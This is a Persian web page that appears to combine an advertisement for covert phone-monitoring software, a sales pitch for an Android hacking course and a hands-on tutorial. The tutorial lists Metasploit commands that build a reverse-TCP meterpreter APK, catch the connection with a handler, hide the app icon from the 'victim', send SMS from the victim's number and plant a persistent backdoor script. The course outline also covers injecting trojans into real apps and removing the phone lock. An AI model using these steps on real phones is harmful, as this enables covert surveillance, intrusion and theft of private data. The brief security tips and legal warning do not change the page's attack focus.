سامانه مراقبت از خانواده SPY24 نظارت بر فرزندان، برنامه ردیابی و کنترل نامحسوس هک گوشی موبایل و تبلت از راه
هک اندروید با کالی لینوکس و مقابله با آن در سال 2022
دوره آموزش ویدئویی هک اندروید (Android Hacking) با کالی لینوکس (Kali Linux) و مقابله حرفه ای با هکر ها برای برقراری امنیت گوشی های هوشمند عنوان این دوره مقدماتی تا پیشرفته است. دوره ویدئویی آموزش هک اندروید ویژه متخصصین هک و امنیت و کارشناسان امنیت سایبری در ایران و به زبان فارسی تهیه شده است.
در مسیر آموزش هک حرفه ای و مقابله با نفوذ و ایمن سازی فضای سایبری در آکادمی لرن فایلز این بار میرسیم به آموزش هک اندروید با کالی لینوکس با آخرین متد های ۲۰۲۰ در سطح بین المللی (آخرین آپدیت). همراه ما باشید.
در دوره قبل به صورت کامل و جامع با کالی لینوکس آشنا شدیم (برای مشاهده آموزش کالی لینوکس اینجا کلیک کنید)و حالا در این دوره ویدئویی به صورت حرفه ای به مبحث هک و نفوذ به سیستم عامل اندروید و در نهایت پوشش کامل مباحث جلوگیری از نفوذ و هک گوشی همراه می پردازیم.
در این دوره با نرم افزار های ساده و آماده به سیستم عامل اندروید نفوذ نمی کنیم بلکه با سیستم عامل کالی لینوکس (Kali linux) و ابزار های بروز آن، مثل یک متخصص حرفه ای، مباحث هک و امنیت اندروید را فرا می گیریم.
متاسفانه نفوذ به اندروید کار ساده است چون این سیستم عامل متن باز یا همان اُپن سورس است لذا هک کردن گوشی اندرویدی یکی از مشکلاتی است که باید برای ایمن کردن و جلوگیری از هک شدن گوشی اندرویدی خود، یادگیری مبحث هک اندروید را در برنامه قرار دهیم.
✍در مورد دوره هک اندروید بیشتر بدانید:
همانطور که می دانید پر استفاده ترین سیستم عامل گوشی های هوشمند Android و IOS است اما واقعا با داشتن این گوشی ها حریم شخصی چقدر اهمیت دارد؟ چقدر امنیت را تضمین کرده ایم یا می توانیم تضمین کنیم؟ شما متخصص امنیت و تست نفوذ حتماً می دانید که در حال حاضر پر زیان ترین حمله ها از طریق گوشی های هوشمند صورت میگرد! آیا تخصص کافی را برای مقابله با این دسته از حملات امنیتی دارید؟
برنامه نویسان اندروید چقدر در مورد امنیت برنامه خودتان اطلاع دارید؟ آیا اطلاعی از شیوه های هک برنامه های اندرویدی دارید؟ چقدر اطلاعات عمومی و حتی تخصصی در زمینه هک و امنیت ویژه سیستم عامل اندروید دارید؟ آیا از حریم خود و مشتریانتان محافظت می کنید؟
در این دوره قرار است با هم انواع راه های نفوذ به اندروید را یاد بگیریم البته با مقاصد خوب! همچنین روش مقابله با این حملات و آشنایی با حفره های امنیتی و… رو بررسی می کنیم.
برخی از عناوینی آموزش هک اندروید (سرفصل کامل در ادامه آمده است) :
✔️ نصب و کار با کالی لینوکس
✔️ ساخت تروجان (Trojan)
✔️ آموزش ابزار های مختلف کالی برای هک اندروید
✔️ بررسی حرفه ای ترین روش های مقابله با هکر ها و جلوگیری از نفوذ به اندورید
✔️ هک گوشی اندروید با متاسپلویت (هک اندروید با متاسپلویت)
✔️ هک اندروید از راه دور
در این دوره آموزشی به نحوه هک اندروید و مقابله با هک با استفاده از کالی لینوکس پرداخته ایم. یادگیری نفوذ به اندروید و راه های مقابله با آن پایه برقراری امنیت است و در تمام آموزش های هک و امنیت لرن فایلز اساس یادگیری تنها امنیت و برقراری آرامش در فضای سایبری است.
مشخصات دوره ویدئویی آموزش هک اندروید :
???? دوره ویدئویی آموزش اندروید هکینگ و مقابله با آن ( ۲۰۲۰)
???? از مقدماتی تا پیشرفته – مناسب برای کارشناسان هک و امنیت در ایران و برنامه نویسان اندروید
???? زبان فارسی: آموزش هک اندروید به زبان فارسی بوده و شامل ۲۴ ویدئوی فارسی زبان است.
???? ویژه ورود به بازار کار: این آموزش به صورت ویژه جهت ورود به بازارکار و کسب درآمد تدریس شده است!
???? آموزش با زمان مفید و کاربردی:
مدت زمان این آموزش با حفظ جامعیت و پوشش تمامی مباحث با کمک گرفتن از متد های بروز در زمینه تدریس و آموزش ویدئویی، به گونه ای تنظیم شده است که شما با کم ترین زمان بیشترین میزان یادگیری را داشته باشید! آموزش هک اندروید در حالی که مطالب بیشتری را پوشش داده و نسبت به سایر آموزش ها جامع تر است، مدت زمان آن به نسبت آموزش های مشابه ⣿ یک سوم ⣿ است یعنی اکثر دوره های موجود در سطح وب همین محتوا را در زمانی معادل ۳ برابر این دوره تدریس می کنند که این موضوع باعث اتلاف وقت زیادی در یادگیری شما خواهد شد! لذا مدت زمان این دوره فوق العاده مفید بوده و در کمترین زمان بیشترین مباحث را می آموزید!
???? آپدیت مداوم: دوره آموزش هک اندروید به صورت مداوم و به درخواست شما کاربران عزیز آپدیت می شود!
✔️ پشتیبانی ۳۶۰ درجه: مدرس دوره آموزش اندروید هکینگ، آقای سینا یغمائیان عزیز، در تمام مراحل همراه شماست و می توانید سوالات خود را در همین صفحه از ایشان بپرسید!
راهنمای دریافت آموزش هک اندروید و مقابله با آن:
برای دانلود آموزش هک اندروید و دریافت این دوره از بالا-ستون سمت چپ، جهت خرید اقدام کنید.
⛔ تذکر به آن دسته از افرادی که قصد ارتکاب جرم را دارند:
اگر تصمیم به هک با مقاصد غیر اخلاقی و غیر حرفه ای دارید و هدف شما ایجاد امنیت نیست بلکه بر هم زدن امنیت کشور و آرامش مردم است، توصیه می کنیم حتماً ویدئو خط قرمز های سایبری را در ادامه مشاهده کنید تا با جرائم سایبری و مجازات های سنگین آن در ایران آشنا شوید و بدانید که در ایران بیش از تعداد هکر ها، ما متخصین امنیت داریم که اول از هر چیز آرامش و امنیت هموطنان ما برایشان اهمیت دارد و با تجهیزات نرم افزاری و سخت افزاری گوناگون و بسیار قدرتمند در صورت مشاهده هر گونه جرم سایبری در کم تر از چند ساعت یا حتی چند دقیقه شما را شناسایی و به عنوان مجرم سایبری تحویل مقامات ذیربط خواهند داد. همچنین علاوه بر مشاهده ویدئویی که در ادامه آمده است، توصیه می کنیم به این لینک و این لینک مراجعه کنید تا قبل از هرگونه اقدام غیر حرفه ای کمی بیشتر با قوانین آشنا شوید!
کمی در مورد سیستم عامل اندروید بدانیم:
سیستم عامل اندروید یکی از سیستم عامل های محبوب در جهان است که روزانه به مخاطبان آن افزوده میشود. این سیستم عامل برای موبایل طراحی شده و البته امکان نصب ان در هر سیستمی وجود دارد به همین دلیل محبوبیت داشته و مخاطبان آن بسیار بیشتر از سایر رقبایش هستند.
به علت متن باز بودن اندروید خطر در کمین این سیستم عامل است و متاسفانه اندروید هم از این قاعده مستثنی نبوده و انواع مختلف بدافزارها ، ویروس ها و برنامه های مخرب برای آن نوشته شده و خواهد شد. (می توانید لیست برخی از برنامه های مخرب اندروید را اینجا ببینید!)
در این آموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و متاسپلویت آشنا خواهید شد و مباحث مرتبط را به صورت مبتدی تا حرفه می آموزید. در ادامه می توانید جزئیات این دوره ویدئویی را ببینید. همراه ما باشید!
آیا هک اندروید امکان دارد؟
متاسفانه پاسخ بله است! این روز ها آنقدر راه های هک و نفوذ متنوع و زیاد شده است که هیچ دستگاه الکترونیکی نمی تواند ۱۰۰ درصد خودش را ایمن نامگذاری کند. گوشی های اندروید هم مانند سایر دستگاه ها به راحتی یا سختی هک می شوند اما روش های گوناگونی وجود دارد و هر روشی نیاز به ابزاری خاص و دانش کار با آن ابزار دارد.
اولین و اساسی ترین ابزار سیستم عامل لینوکس نسخه Kali Linux می باشد که ما اخیراً دوره ویدئویی آموزش مقدماتی تا پیشرفته آن را تولید و منتشر کرده ایم.
حالا جالب و البته نگران کننده این است که هسته اندروید نیز لینوکسی بوده و این موضوع نفوذ به اندروید را بسیار آسان کرده است.
هک اندروید با استفاده از نرم افزار:
ما در این دوره روش حرفه ای و اصولی نفوذ و مقابله با هک اندروید یعنی استفاده از کالی لینوکس را به شما می آموزیم اما خوب بهتر است قبل از شروع دوره با این نرم افزار ها که کار را ساده می کنند اما نتیجه را خراب و یا اشتباه، آشنا کنیم.
بسیاری از هکر ها نرم افزار ها و برنامه هایی را ایجاد کرده اند که شما به راحتی می توانید کمی غفلت صاحب گوشی هوشمند به گوشی فرد نفوذ کنید.
این نرم افزار ها کم نیستند اما نکته ای که در استفاده از این ابزار ها و نرم افزار ها بسیار خطرناک است این است که احتمال آلوده و مخرب بودن خود این ابزار ها نیز وجود دارد و اینجاست که بهترین و استاندارد ترین و شاید بهتر است بگوییم حرفه ای ترین روش استفاده از سیستم عامل معتبر کالی و ابزار های آن است.
برخی از این برنامه ها (برنامه های RAT) عبارتند از:
✔️ برنامه AndroRAT
✔️ برنامه Hackode
✔️ برنامه zANTI
✔️ و بسیاری نرم افزار های دیگر
(RAT) رت یا رات چیست؟
رت (RAT) مخفف واژه Remote Access Trojan یا Remote Administration Tool می باشد و به معنای دسترسی از راه دور است. رت به شما این امکان را می دهد تا سیستم یا گوشی را کنترل نمایید! زمانی که یک گوشی هک می شود و دسترسی به اطلاعات عمومی می شود علت آن چیست؟ بله! رت (RAT).
هکر ها از RAT ها برای کنترل گوشی قربانی استفاده می کنند! رت ابزار بسیار خطرناکی است.
حالا ببینیم RAT چگونه عمل می کند: تصور کنید یکی از همکاران یا آشنایان شما برایتان یک فایل را می فرستد که پسوند آن می تواند exe یا حتی mp3 و شاید حتی تصویر باشد و به شما این نوید را می دهد که با این فایل می توانید تلگرام یا اینستاگرام کسی را هک کنید اما شما غافل از همه چیز هستید!
زمانی که این فایل را باز می کنید یا اجرا می کنید احتمالاً هیچ اتفاقی نمی افتد شاید هم یک Error را دریافت کنید شاید هم برنامه به درستی عمل کند و اجرا شود، اما این وضعیت اصلاً خوب نیست چون شما در حال کار کردن با یک ابزار مخرب هستید!
سیستم شما در حال حاضر در دسترس و در اختیار هکر هست اما شما هیچ اطلاعی از این ماجرا ندارید❗بله این میشه رت یا رات (RAT).
سرفصل های دوره ویدئویی آموزش هک اندروید و مقابله با نفوذ:
- مقدمه و شروع دوره
- مقدمه
- معرفی دوره و سرفصل ها
- پیش نیاز ها
- معرفی پیش نیاز ها
- آماده سازی و نصب
- آماده سازی کالی و نصب کالی لینوکس
- به روز رسانی METASPLOIT
- تروجان چیست؟ آموزش ساخت Trojan
- ساخت تروجان به شکل پیشفرض و اولیه توسط MSFVenom
- توضیح آرگومان های ورودی
- راه اندازی Listener و نصب و نفوذ به گوشی اندورید
- گرفتن دسترسی و توضیحات
- خواندن اطلاعات
- خواندن Call Log ها
- جلوگیری از خواندن SMS ها
- جلوگیری و محافظت از خواندن تصاویر دوربین گوشی
- دلیل از دست رفتن دسترسی
- کمی پیشرفته تر
- دائمی کردن دسترسی توسط چند خط کد کوتاه
- Android Shell
- آپلود فایل به گوشی تارگت و اجرای کد برای دسترسی دائمی
- تست خاموش و روشن کردن گوشی و گرفتن دسترسی بدون نیاز به نصب یا اجرای برنامه توسط کاربر!
- مخفی کردن آیکون برنامه ی مخرب از گوشی هدف
- تزریق PAYLOAD به یک نرم افزار واقعی و ارسال آن به گوشی هدف Embedding
- دسترسی های یک نرم افزار و نکات مربوط به انتخاب نرم افزار برای آلوده کردن آن به تروجان
- توضیح STATIC IP و DYNAMIC IP برای تست نفوذ خارج از شبکه
- توضیح VPS
- کار با Armitage و توضیحات آن
- دانلود و نصب و کار با Evil Droid Master و کار با تمام گزینه ها (ساخت تروجان به شکل خودکار و تزریق کد به APK)
- پاک کردن قفل گوشی بعد از دسترسی
- تست دسترسی داشتن و یا نداشتن APP و تاثیر آن در هک
- صحبت های پایانی دوره هک اندروید با Kali:
- جمع بندی و ارائه توضیحات تکمیلی
- خط قرمز و جرایم سایبری در ایران و ادامه ی راه یادگیری شما
- ادامه ی راه دنیای هک و امنیت
هک اندروید با کالی لینوکس و امنیت + ویدیو (100% عملی)
در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس می پردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم در این اموزش هک و امنیت با ما همراه باشید.
هک اندروید و امنیت
توضیحات درباره هک اندروید
سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند
این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد
به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد.
هک اندروید با استفاده از کالی لینوکس و راه های امنیت
آموزش هک اندروید با کالی لینوکس
متاسپلویت
متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم ؛ اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد،
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است
و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک اندروید خواهیم ساخت و ان را اجرا میکنیم.
اموزش ویدیو ای هک اندروید و امنیت
اموزش تست نفوذ اندروید
در ابتدا با دستور زیر وارد متاسپلویت شوید
msfconsole
بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید
use android/meterpreter/reverse_tcp
حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید، دقت داشته باشید در این بخش باید ای پی سرور خود را وارد کنید در صورتی که از سرور استفاده نمی کنید باید در سیستم خود ای پی ثابت بگیرید و پورت فورواردینگ انجام دهید که اموزش ان در پن تست کور قرار داده شده است.
set LHOST 127.0.0.1
و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت 6060 را استفاده میکنیم
set LPORT 6060
حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید
generate -f raw -o PentestCore.apk
دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید
use multi/handler
و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم
set PAYLOAD android/meterpreter/reverse_tcp
مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد
و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد
و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید.
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گذاشت.
هک اندروید با استفاده از کالی لینوکس و راه های امنیت
نحوه استفاده از meterpreter بعد از نفوذ
استفاده از 3 دستور پرکاربرد پس از گرفتن دسترسی از قربانی :
دستورات بسیار زیادی پس از دسترسی گرفتن از اندروید قربانی پیش روی شماست که می توانید با استفاده از دستور help تمام دستورات را مشاهده کنید و از آنها استفاده کنید، اما در این قسمت از آموزش قصد داریم شما را با 3 دستور مهم و کاربردی آشنا کنیم .
دستور اول : hide_app_icon
با استفاده از این دستور می توانید آیکن فایل مخرب خود را مخفی کنید تا قربانی شما توانایی حذف کردن ان را نداشته باشد تا دسترسی طولانی تری داشته باشید بتوانید تست نفوذ خود را بدون مشکلی پیش ببرید.
دستور دوم : check_root
با استفاده از دستور بالا می توانید نسخه سیستم عامل اندروید هک شده خود را چک کنید که ایا روت است یا خیر؟
تا اگر روت است با استفاده از بکدوری که در ادامه انرا به شما معرفی خواهیم کرد دسترسی خود دائمی کنید.
دستور سوم : send_sms -d number -t ” body text sms ”
دستور بالا دستور بسیار جذابی است که می توانید با استفاده از این دستور
با شماره قربانی یک sms به شماره مورد نظر خود ارسال کنید.
نکته : در قسمت number باید شماره مورد نظر که قصد دارید sms به ان ارسال شود را وارد کنید و در قسمت text باید متن دلخواه خود را وارد کنید و سپس بر روی enter کلیک کنید تا sms برای شماره مورد نظر شما با شماره قربانی ارسال شود.
ایجاد بکدور بر روی اندروید قربانی
در ابتدا باید با استفاده از دستوری که بالاتر به شما معرفی کردیم روت بودن اندروید قربانی خود را چک کنید و اگر اندروید تارگت شما روت بود می توانید با ایجاد یک بکدور دسترسی خود را دائمی کنید؛ به این منظور در ابتدا با استفاده از دستور زیر به مسیر اصلی اندروید بروید :
/ cd
سپس در این مرحله باید با استفاده از دستور زیر به مسیر sdcard وارد شوید :
cd /sdcard
سپس فایل بکدور که در انتهای آموزش برای شما قرار داده ایم را دانلود کنید و در مرحله بعدی با استفاده از دستور اپلود , اسکریپت موجود که با زبان bash نوشته شده است را بر روی اندروید قربانی خود اپلود کنید.
upload /root/Desktop/backdoor.sh /sdcard
دقت کنید که باید مسیر اسکریپت را به درستی وارد کنید تا عملیات اپلود به خوبی انجام شود.
در مرحله بعدی باید با استفاده از دستور shell ، محیط شل خود را به محیط شل اندروید تغیر دهید .
سپس مجددا دو دستور زیر را وارد کنید تا به محلی که در آن اسکریپت را آپلود کرده اید برسید :
/ cd
cd /sdcard
در این قسمت باید با استفاده از دستور زیر اسکریپت را برای اجرا بکدور بعد از هک اندروید وارد کنید :
sh lifetime.sh
در نهایت باید با استفاده از دستور reboot یک بار سیستم عامل اندروید قربانی را reboot کنید ، سپس زمانی که اندروید قربانی شما مجددا راه اندازی شما هر 20 ثانیه یک بار برای ای پی شما و پورت مورد نظر شما درخواست ارسال می کند که می توانید از اکسپلویت مولتی هندلر استفاده کنید و به دستگاه اندروید مورد نظر خود متصل شوید.
آموزش امنیت و جلوگیری از هک اندروید
برای امنیت در اندروید روش های بسیاری وجود دارد که موارد زیر برخی از مهم ترین ان ها هستند :
از انتی ویروس های اورجینال اندرویدی استفاده کنید
از نصب برنامه های نامعتبر و کرک شده خود داری کنید
با استفاده از کالی لینوکس تست نفوذ را بر روی دستگاه خود به صورت دوره ای انجام دهید.
از دریافت برنامه به غیر از پلی استور خود داری کنید
بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
هک اندروید با استفاده از کالی لینوکس و راه های امنیت
دانلود ویدیو اموزشی
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید ، چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد
پایدار باشید.